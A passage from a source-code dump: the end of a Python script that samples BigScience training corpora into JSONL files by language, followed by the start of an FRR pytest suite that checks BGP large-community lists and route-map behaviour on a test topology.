"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_catalan_textual_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_bangla_lm": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_openiti_proc": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_arabic_billion_words": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_brwac": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_project_gutenberg": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_the_pile_uspto": 0.5441176470588235, # ((350 [expected] - ( 326 [catalogue_en] - 251 [s2orc] - 21 [uspto]) ) * 1/2 [catalogue_en_proportion]) / (251 [s2orc] + 21 [uspto])
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_code_stackexchange": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_hal_archives_ouvertes": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_code_github-no-gpl": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_wudaocorpora": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_s2orc_ai2_pdf_parses": 0.5441176470588235, # ((350 [expected] - ( 326 [catalogue_en] - 251 [s2orc] - 21 [uspto]) ) * 1/2 [catalogue_en_proportion]) / (251 [s2orc] + 21 [uspto])
}
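# Worked check of the two 0.544... / 0.134... ratios above, reading the
# bracketed figures as corpus sizes (an assumption on our part):
# catalogue_en without s2orc and uspto is 326 - 251 - 21 = 54; the remaining
# en budget is 350 - 54 = 296, split 1/2 between catalogue and OSCAR,
# i.e. 148. Then 148 / (251 + 21) = 0.5441176470588235 for s2orc/uspto and
# 148 / 1_100 = 0.13454545454545455 for OSCAR en.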
OSCAR_DATASETS = {
# oscar
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/ar": 1,
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/bn": 1,
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/ca": 1,
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/en": 0.13454545454545455, # ((350 [expected] - ( 326 [catalogue_en] - 251 [s2orc] - 21 [uspto]) ) * 1/2 [oscar_en proportion] ) / 1_100 [oscar_en]
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/es": 1,
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/eu": 1,
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/fr": 1,
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/hi": 1,
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/id": 1,
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/pt": 1,
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/ur": 1,
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/vi": 1,
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/zh": 1
}
assert set(OSCAR_DATASETS.keys()).isdisjoint(set(CATALOGUE_DATASETS.keys()))
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument(
"--dataset-path", choices=list(set(CATALOGUE_DATASETS.keys()) | set(OSCAR_DATASETS.keys())), type=str, required=True,
help="Dataset path."
)
parser.add_argument(
"--save-jsonl-dataset-path-prefix", type=Path, required=True,
help="Where to output json file. Files will be save in `{args.save_jsonl_dataset_path_prefix}/{lang}/{dataset_name}"
)
parser.add_argument(
"--num-proc", type=int, default=1
)
parser.add_argument(
"--batch-size", type=int
)
return parser.parse_args()
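# Minimal usage sketch (the script filename is hypothetical; --dataset-path
# must be one of the keys defined above):
#   python sample_to_jsonl.py \
#       --dataset-path /gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_wikipedia \
#       --save-jsonl-dataset-path-prefix /tmp/jsonl \
#       --num-proc 4 --batch-size 1000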
catalogue_language_regex = re.compile(
r"^/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_([^_]+)_.*$"
)
normalise_catalogue_dataset_name_regex = re.compile(
r"^/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/(.*)$"
)
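# For example, for ".../bigscience-catalogue-lm-data/lm_fr_wikipedia" the first
# regex captures the language "fr" and the second captures the normalised
# dataset name "lm_fr_wikipedia".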
def get_catalogue_language(dataset_name: str) -> str:
lang_candidate = catalogue_language_regex.match(dataset_name).group(1)
    # Normalise Chinese language codes so that simplified and traditional Chinese are the only two Chinese variants we track
if lang_candidate in ["zh", "zhs", "zh-cn"]:
lang_candidate = "zhs"
elif lang_candidate in ["zht", "zh-tw"]:
lang_candidate = "zht"
else:
assert lang_candidate[:2] != "zh"
return lang_candidate
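# e.g. "zh", "zhs" and "zh-cn" all normalise to "zhs" (simplified Chinese),
# while "zht" and "zh-tw" normalise to "zht" (traditional Chinese); any other
# code starting with "zh" trips the assertion above.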
oscar_to_bs_language = {
"ar": "ar",
"bn": "indic-bn",
"ca": "ca",
"en": "en",
"es": "es",
"eu": "eu",
"fr": "fr",
"hi": "indic-hi",
"id": "id",
"pt": "pt",
"ur": "indic-ur",
"vi": "vi",
"zh": "zhs"
}
oscar_language_regex = re.compile(
r"^/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/(.*)$"
)
def get_oscar_language(dataset_name: str) -> str:
return oscar_to_bs_language[oscar_language_regex.match(dataset_name).group(1)]
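# e.g. the oscar_dedup/bn path maps to the BigScience language code
# "indic-bn", while oscar_dedup/fr simply stays "fr".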
def sample_dataset(dataset: Dataset, ratio: float) -> Dataset:
logger.info(f"Ratio: {ratio}")
if ratio >= 1:
return dataset
num_samples = int(len(dataset) * ratio)
indices = rng.choice(len(dataset), size=num_samples, replace=False, shuffle=False)
return dataset.select(indices)
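# Sketch of the sampling behaviour (hypothetical sizes): with
# len(dataset) == 1_000 and ratio == 0.25, num_samples == 250 and rng.choice
# draws 250 distinct row indices without replacement; any ratio >= 1 returns
# the dataset unchanged.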
def main():
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO,
)
args = get_args()
logger.info(f"** The job is runned with the following arguments: **\n{args}\n **** ")
# Compute save path
save_path: Path
if args.dataset_path in CATALOGUE_DATASETS:
lang = get_catalogue_language(args.dataset_path)
filename = f"{normalise_catalogue_dataset_name_regex.match(args.dataset_path).group(1)}.jsonl"
save_path = Path(args.save_jsonl_dataset_path_prefix) / lang / filename
elif args.dataset_path in OSCAR_DATASETS:
lang = get_oscar_language(args.dataset_path)
save_path = Path(args.save_jsonl_dataset_path_prefix) / lang / f"lm_{lang}_oscar.jsonl"
else:
raise NotImplementedError
    # An already saved dataset doesn't require us to re-run the pipeline
if save_path.exists():
logger.info(f"{save_path} already exists. Exiting early.")
return
# load_dataset
logger.info(f"Loading {args.dataset_path}")
if args.dataset_path in CATALOGUE_DATASETS:
ds = load_from_disk(Path(args.dataset_path) / "final")
elif args.dataset_path in OSCAR_DATASETS:
ds = load_from_disk(args.dataset_path)
else:
raise NotImplementedError
# remove all columns except text
logger.info(f"Removing all columns except `text`")
columns_to_remove = set(ds.column_names)
columns_to_remove.remove("text")
ds = ds.remove_columns(list(columns_to_remove))
# sample dataset according to ratio
logger.info(f"Sampling dataset according to given ratio")
if args.dataset_path in CATALOGUE_DATASETS:
ds = sample_dataset(ds, CATALOGUE_DATASETS[args.dataset_path])
elif args.dataset_path in OSCAR_DATASETS:
ds = sample_dataset(ds, OSCAR_DATASETS[args.dataset_path])
else:
raise NotImplementedError
# save to json
logger.info(f"Saving to {save_path}")
tmp_save_path = Path(save_path.parent, f"tmp-{save_path.name}")
tmp_save_path.parent.mkdir(parents=True, exist_ok=True)
ds.to_json(
tmp_save_path,
num_proc=args.num_proc,
batch_size=args.batch_size
)
tmp_save_path.rename(save_path)
if __name__ == "__main__":
main()
6b62b2c5eeb9eaf252c1f83661497f63e26a726b | 78,217 | py | Python | src/frr/tests/topotests/bgp_large_community/test_bgp_large_community_topo_2.py | zhouhaifeng/vpe | 9c644ffd561988e5740021ed26e0f7739844353d | ["Apache-2.0"]
#!/usr/bin/env python
#
# Copyright (c) 2019 by VMware, Inc. ("VMware")
# Used Copyright (c) 2018 by Network Device Education Foundation,
# Inc. ("NetDEF") in this file.
#
# Permission to use, copy, modify, and/or distribute this software
# for any purpose with or without fee is hereby granted, provided
# that the above copyright notice and this permission notice appear
# in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND VMWARE DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL VMWARE BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY
# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
# OF THIS SOFTWARE.
#
"""
test_bgp_large_community_topo_2.py: Test BGP large community.
The following tests are covered:
1. Verify the standard large-community-lists can permit or deny
a large community attribute only in the correct canonical format.
2. Verify the expanded large-community-lists can permit or deny
a large community attribute both in the correct canonical format
as well as REG_EX.
3. Verify that we can modify a large-community-list that is in use,
to add/remove attribute values, and that the change takes immediate effect.
4. Verify that the large community attribute gets advertised when a
route-map is applied to a neighbor and cleared when the route-map
is removed.
5. Verify that duplicate BGP Large Community values are NOT transmitted.
6. Verify that if we want to remove all the large-community attributes from a
set of prefixes, we can set the value as NONE.
7. Redistribute connected and static routes in the BGP process with a route-map
appending/removing L-comm attributes.
8. Verify that if we want to remove specific large-community values from
a set of prefixes, we can make use of the DELETE operation based on an L-comm list.
9. Verify that if community values are NOT to be advertised to a specific
neighbour, we negate the send-community command.
(Send-community all is enabled by default for all neighbors)
10. Verify that large-community lists cannot be configured without providing
specific L-community values (for match/delete operation in a route-map).
11. Verify that the Match_EXACT clause should pass only if all of the L-comm
values configured (horizontally) in the community list are present in
the prefix. There must be no additional L-communities in the prefix.
12. Verify that the Match_ALL clause should pass only if ALL of the L-comm values
configured (horizontally) in the community list are present in the prefix.
There could be additional L-communities in the prefix that are not present
in the L-comm list.
13. Verify that the Match_ANY clause should pass only if at least one L-comm
value configured (vertically) in the large-community list is present in prefixes.
14. Verify large-community lists operation in a route-map with match RegEx
statements.
"""
import os
import sys
import pytest
import time
# Save the Current Working Directory to find configuration files.
CWD = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(CWD, "../"))
sys.path.append(os.path.join(CWD, "../lib/"))
# pylint: disable=C0413
# Import topogen and topotest helpers
# Import topoJson from lib, to create topology and initial configuration
from lib.topogen import Topogen, get_topogen
from lib.common_config import (
start_topology,
write_test_header,
write_test_footer,
reset_config_on_routers,
create_route_maps,
create_bgp_community_lists,
verify_bgp_community,
step,
verify_create_community_list,
delete_route_maps,
verify_route_maps,
create_static_routes,
check_address_types,
required_linux_kernel_version,
)
from lib.topolog import logger
from lib.bgp import verify_bgp_convergence, create_router_bgp, clear_bgp_and_verify
from lib.topojson import build_config_from_json
pytestmark = [pytest.mark.bgpd]
# Global variables
bgp_convergence = False
NETWORKS = {"ipv4": ["200.50.2.0/32"], "ipv6": ["1::1/128"]}
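# NETWORKS holds the prefixes advertised from r1 and verified on the receiving
# routers throughout the test cases below.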
def setup_module(mod):
"""
Sets up the pytest environment
* `mod`: module name
"""
# Required linux kernel version for this suite to run.
result = required_linux_kernel_version("4.15")
if result is not True:
pytest.skip("Kernel requirements are not met")
testsuite_run_time = time.asctime(time.localtime(time.time()))
logger.info("Testsuite start time: {}".format(testsuite_run_time))
logger.info("=" * 40)
logger.info("Running setup_module to create topology")
# This function initiates the topology build with Topogen...
json_file = "{}/bgp_large_community_topo_2.json".format(CWD)
tgen = Topogen(json_file, mod.__name__)
global topo
topo = tgen.json_topo
# ... and here it calls Mininet initialization functions.
# Starting topology, create tmp files which are loaded to routers
    # to start daemons and then start routers
start_topology(tgen)
# Creating configuration from JSON
build_config_from_json(tgen, topo)
# Checking BGP convergence
global bgp_convergence, ADDR_TYPES
    # Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
    # API call to verify whether BGP has converged
# Ipv4
bgp_convergence = verify_bgp_convergence(tgen, topo)
    assert bgp_convergence is True, "setup_module : Failed \n Error: {}".format(
        bgp_convergence
    )
ADDR_TYPES = check_address_types()
logger.info("Running setup_module() done")
def teardown_module(mod):
"""
Teardown the pytest environment
* `mod`: module name
"""
logger.info("Running teardown_module to delete topology")
tgen = get_topogen()
    # Stop topology and remove tmp files
tgen.stop_topology()
logger.info(
"Testsuite end time: {}".format(time.asctime(time.localtime(time.time())))
)
logger.info("=" * 40)
#####################################################
#
# Testcases
#
#####################################################
def test_create_bgp_standard_large_community_list(request):
"""
Create standard large-community-list and verify it can permit
or deny large community attribute only in the correct canonical
format.
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
    # Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
reset_config_on_routers(tgen)
step("Create srtandard large community list")
input_dict = {
"r4": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "LC_1_STD",
"value": "2:1:1 2:1:2 1:2:3",
"large": True,
},
{
"community_type": "standard",
"action": "permit",
"name": "LC_2_STD",
"value": "3:1:1 3:1:2",
"large": True,
},
]
}
}
result = create_bgp_community_lists(tgen, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify BGP large community is created")
result = verify_create_community_list(tgen, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create srtandard large community list with in-correct values")
input_dict = {
"r4": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "LC_1_STD_ERR",
"value": "0:0:0",
"large": True,
}
]
}
}
result = create_bgp_community_lists(tgen, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    # TODO: should fail
step("Verify BGP large community is created")
result = verify_create_community_list(tgen, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
write_test_footer(tc_name)
def test_create_bgp_expanded_large_community_list(request):
"""
Create expanded large-community-list and verify it can permit
or deny large community attribute both in the correct canonical
format as well as REG_EX
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
    # Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("Create expanded large community list")
input_dict = {
"r4": {
"bgp_community_lists": [
{
"community_type": "expanded",
"action": "permit",
"name": "LC_1_EXP",
"value": "1:1:200 1:2:* 3:2:1",
"large": True,
}
]
}
}
result = create_bgp_community_lists(tgen, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify BGP large community is created")
result = verify_create_community_list(tgen, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
write_test_footer(tc_name)
def test_modify_large_community_lists_referenced_by_rmap(request):
"""
    This test is to verify that we can modify a large-community-list that
    is in use, add/remove attribute values, and that the change takes immediate effect.
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
    # Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("Create standard large community list")
input_dict_1 = {
"r4": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "LC_DEL",
"value": "1:2:1 1:3:1 2:1:1 2:2:2 3:3:3",
"large": True,
}
]
}
}
result = create_bgp_community_lists(tgen, input_dict_1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create route map")
input_dict_2 = {
"r1": {
"route_maps": {
"RM_R2_OUT": [
{
"action": "permit",
"seq_id": "10",
"set": {
"large_community": {
"num": "1:2:1 1:3:1 2:10:1 3:3:3 4:4:4 5:5:5",
"action": "additive",
}
},
}
]
}
},
"r4": {
"route_maps": {
"RM_R4_IN": [
{
"action": "permit",
"seq_id": "10",
"set": {"large_comm_list": {"id": "LC_DEL", "delete": True}},
}
]
}
},
}
result = create_route_maps(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map and advertise networks")
input_dict_3 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"advertise_networks": [{"network": "200.50.2.0/32"}],
"neighbor": {
"r2": {
"dest_link": {
"r1": {
"route_maps": [
{
"name": "RM_R2_OUT",
"direction": "out",
}
]
}
}
}
},
}
},
"ipv6": {
"unicast": {
"advertise_networks": [{"network": "1::1/128"}],
"neighbor": {
"r2": {
"dest_link": {
"r1": {
"route_maps": [
{
"name": "RM_R2_OUT",
"direction": "out",
}
]
}
}
}
},
}
},
}
}
},
"r4": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
}
}
},
}
result = create_router_bgp(tgen, topo, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify Community-list")
dut = "r4"
input_dict_4 = {"largeCommunity": "2:10:1 4:4:4 5:5:5"}
for adt in ADDR_TYPES:
result = verify_bgp_community(tgen, adt, dut, NETWORKS[adt], input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
def test_large_community_lists_with_rmap_apply_and_remove(request):
"""
This test is to verify that large community attribute gets advertised when
route-map is applied to a neighbor and cleared when route-map is removed
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
    # Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("Create route map")
input_dict_1 = {
"r4": {
"route_maps": {
"RM_LC1": [
{
"action": "permit",
"seq_id": "10",
"set": {
"large_community": {
"num": "200:200:1 200:200:10 200:200:20000",
"action": "additive",
}
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map and advertise networks")
input_dict_2 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"advertise_networks": [{"network": "200.50.2.0/32"}]
}
},
"ipv6": {
"unicast": {"advertise_networks": [{"network": "1::1/128"}]}
},
}
}
},
"r4": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r6": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_LC1", "direction": "out"}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r6": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_LC1", "direction": "out"}
]
}
}
}
}
}
},
}
}
},
}
result = create_router_bgp(tgen, topo, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify large-community-list")
dut = "r6"
input_dict_4 = {"largeCommunity": "200:200:1 200:200:10 200:200:20000"}
for adt in ADDR_TYPES:
result = verify_bgp_community(tgen, adt, dut, NETWORKS[adt], input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
step("Delete route map reference by community-list")
input_dict_3 = {"r4": {"route_maps": ["RM_LC1"]}}
result = delete_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify route map is deleted")
result = verify_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify large-community-list")
for adt in ADDR_TYPES:
result = verify_bgp_community(
tgen, adt, dut, NETWORKS[adt], input_dict_4, expected=False
)
assert result is not True, (
"Testcase {} : Failed \n "
"largeCommunity is still present after deleting route-map \n Error: {}".format(
tc_name, result
)
)
write_test_footer(tc_name)
def test_duplicate_large_community_list_attributes_not_transitive(request):
"""
This test is to verify that duplicate BGP Large Community values
    are NOT transmitted.
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
    # Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("Create route map")
input_dict_1 = {
"r4": {
"route_maps": {
"RM_R4_IN": [
{
"action": "permit",
"seq_id": "10",
"set": {
"large_community": {
"num": "0:0:1 0:0:10 0:0:100 2:0:1 2:0:2 2:0:3"
" 2:0:4 2:0:5",
"action": "additive",
}
},
}
],
"RM_R4_OUT": [
{
"action": "permit",
"seq_id": "10",
"set": {
"large_community": {
"num": "0:0:1 0:0:10 0:0:10000 2:0:1 2:0:2",
"action": "additive",
}
},
}
],
}
}
}
result = create_route_maps(tgen, input_dict_1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map and advertise networks")
input_dict_2 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"advertise_networks": [{"network": "200.50.2.0/32"}]
}
},
"ipv6": {
"unicast": {"advertise_networks": [{"network": "1::1/128"}]}
},
}
}
},
"r4": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
},
"r6": {
"dest_link": {
"r4": {
"route_maps": [
{
"name": "RM_R4_OUT",
"direction": "out",
}
]
}
}
},
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
},
"r6": {
"dest_link": {
"r4": {
"route_maps": [
{
"name": "RM_R4_OUT",
"direction": "out",
}
]
}
}
},
}
}
},
}
}
},
}
result = create_router_bgp(tgen, topo, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify large-community-list")
dut = "r6"
input_dict_4 = {
"largeCommunity": "0:0:1 0:0:10 0:0:100 0:0:10000 2:0:1 2:0:2 2:0:3 2:0:4 2:0:5"
}
for adt in ADDR_TYPES:
result = verify_bgp_community(tgen, adt, dut, NETWORKS[adt], input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
def test_large_community_lists_with_rmap_set_none(request):
"""
    This test is to verify that if we want to remove all the large-community
    attributes from a set of prefixes, we can set the value as NONE.
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
    # Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("Create route map")
input_dict_1 = {
"r4": {
"route_maps": {
"RM_R4_IN": [
{
"action": "permit",
"seq_id": "10",
"set": {
"large_community": {
"num": "0:0:1 0:0:10 0:0:100 2:0:1 2:0:2 2:0:3"
" 2:0:4",
"action": "additive",
}
},
}
]
}
},
"r6": {
"route_maps": {
"RM_R6_IN": [
{
"action": "permit",
"seq_id": "10",
"set": {"large_community": {"num": "none"}},
}
]
}
},
}
result = create_route_maps(tgen, input_dict_1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map")
input_dict_2 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"advertise_networks": [{"network": "200.50.2.0/32"}]
}
},
"ipv6": {
"unicast": {"advertise_networks": [{"network": "1::1/128"}]}
},
}
}
},
"r4": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
}
}
},
"r6": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r6": {
"route_maps": [
{"name": "RM_R6_IN", "direction": "in"}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r6": {
"route_maps": [
{"name": "RM_R6_IN", "direction": "in"}
]
}
}
}
}
}
},
}
}
},
}
result = create_router_bgp(tgen, topo, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify Community-list")
dut = "r6"
for adt in ADDR_TYPES:
result = verify_bgp_community(tgen, adt, dut, NETWORKS[adt], expected=False)
assert result is not True, (
"Testcase {} : Failed \n "
"Community-list is still present \n Error: {}".format(tc_name, result)
)
write_test_footer(tc_name)
def test_lcomm_lists_with_redistribute_static_connected_rmap(request):
"""
    This test is to verify redistribution of connected and static routes
    into the BGP process with a route-map appending/removing L-comm attributes.
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
    # Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("create static routes")
input_dict = {
"r1": {
"static_routes": [
{"network": "200.50.2.0/32", "next_hop": "10.0.0.6"},
{"network": "1::1/128", "next_hop": "fd00:0:0:1::2"},
]
}
}
result = create_static_routes(tgen, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("redistribute static routes")
input_dict_1 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"redistribute": [
{
"redist_type": "static",
"attribute": "route-map RM_R2_OUT",
},
{
"redist_type": "connected",
"attribute": "route-map RM_R2_OUT",
},
]
}
},
"ipv6": {
"unicast": {
"redistribute": [
{
"redist_type": "static",
"attribute": "route-map RM_R2_OUT",
},
{
"redist_type": "connected",
"attribute": "route-map RM_R2_OUT",
},
]
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create route map")
input_dict_3 = {
"r1": {
"route_maps": {
"RM_R2_OUT": [
{
"action": "permit",
"set": {"large_community": {"num": "55:55:55 555:555:555"}},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify large-community-list for static and connected ipv4 route on" " r2")
input_dict_5 = {"largeCommunity": "55:55:55 555:555:555"}
if "ipv4" in ADDR_TYPES:
dut = "r2"
networks = ["200.50.2.0/32", "1.0.1.17/32"]
result = verify_bgp_community(tgen, "ipv4", dut, networks, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
step("Verify large-community-list for static and connected ipv4 route" " on r4")
dut = "r4"
networks = ["200.50.2.0/32", "1.0.1.17/32"]
result = verify_bgp_community(tgen, "ipv4", dut, networks, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
if "ipv6" in ADDR_TYPES:
step("Verify large-community-list for static and connected ipv6 route" " on r2")
dut = "r2"
networks = ["1::1/128", "2001:db8:f::1:17/128"]
result = verify_bgp_community(tgen, "ipv6", dut, networks, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
step("Verify large-community-list for static and connected ipv6 route" " on r4")
dut = "r4"
networks = ["1::1/128", "2001:db8:f::1:17/128"]
result = verify_bgp_community(tgen, "ipv6", dut, networks, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
def test_large_community_lists_with_rmap_set_delete(request):
"""
    This test is to verify that if we want to remove specific large-community
    values from a set of prefixes, we can make use of the DELETE operation
    based on an L-comm list.
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
    # Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("configure route_map")
input_dict_2 = {
"r6": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
